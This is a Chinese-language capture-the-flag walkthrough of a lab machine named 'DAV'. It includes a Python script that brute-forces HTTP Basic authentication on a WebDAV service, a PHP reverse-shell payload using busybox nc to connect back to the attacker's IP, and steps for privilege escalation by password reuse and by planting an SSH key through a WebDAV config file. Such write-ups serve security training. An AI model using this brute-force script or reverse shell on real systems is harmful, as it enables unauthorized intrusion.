靶机DAV

userflag(web打点)

端口扫描

一个80的web服务，还有一个6065的其它服务，后面知道其实是webdav服务，简单来说就是网络文件夹

80端口发现一个子域名：dev.dav.dsz

然后目录扫描没扫除东西

但是这截图证明是和webdav有关，先放在这！

6065webdav服务，需要http basic认证，直接脚本爆破

import requests
import base64

url = "http://192.168.3.7:6065/"
user = "admin"

password_file = r"C:\Users\MR\Documents\top密码\top1000.txt"

with open(password_file, "r", encoding="utf-8", errors="ignore") as f:
    passwords = f.read().splitlines()

for p in passwords:
    auth = f"{user}:{p}"
    b64 = base64.b64encode(auth.encode()).decode()

    headers = {
        "Authorization": f"Basic {b64}"
    }

    try:
        r = requests.get(
            url,
            headers=headers,
            allow_redirects=False,
            proxies={"http": None, "https": None},
            timeout=5
        )

        print(f"{user}:{p} -> {r.status_code}")

        if r.status_code in [200, 301, 302, 207]:
            print(f"\n[+] SUCCESS FOUND: {user}:{p}")
            break

    except:
        pass

然后就是你爆破毕竟是靠运气吗，所以你字典尽量多弄点，网上查查常见的webdav的默认密码啥的！

[+] SUCCESS FOUND: admin:qwertyuiop

然后使用cadaver去连接

ls                  # 列出目录
cd folder           # 进入子目录
put localfile.txt   # 上传本地文件到服务器
get remotefile.txt  # 下载服务器文件到本地
delete remotefile.txt # 删除服务器文件
mkdir newfolder     # 新建目录
quit                # 退出连接

然后下面拿到两个关键信息

dav:/projects/webapp-api/> cat .env.example
DB_HOST=127.0.0.1
DB_USER=dev_user
DB_PASS=P@ssw0rd2026!
AWS_ACCESS_KEY=AKIAIOSFODNN7EXAMPLE

这里有个密码可以尝试ssh密码复用啥的，但是dev_user不行

test文件

<?php phpinfo(); ?>

想着是php文件访问一些发现不解析（这里正常思路就是还要尝试一下其它文件和webdav下的其它目录能不能解析）但是都不行

这里其实就应该将整合起来看，前面那个子域名不也是webdav目录吗（这里打的时候考虑的是通过80端口去文件包含）

直接覆盖test，写反弹shell就好了

<?php
exec("busybox nc 192.168.3.6 6666 -e /bin/sh");
?>

rootflag(提权)

拿到shell之后就开始乱搞，直接linpeas扫一遍，反正无效的操作搞了好久

密码复用ssh连接user

提权到user再去root

这个webdav网上没有提权思路，得看它具体命令可以怎么用，其实就是关于搭建webdav服务器的命令。

通过配置文件提权，使用-c参数指定按照配置文件启动webdav，先去看看/etc/webdav/config.yaml

我们创建一个类型的文件把端口和目录改下

然后访问

写入公钥

然后免密连接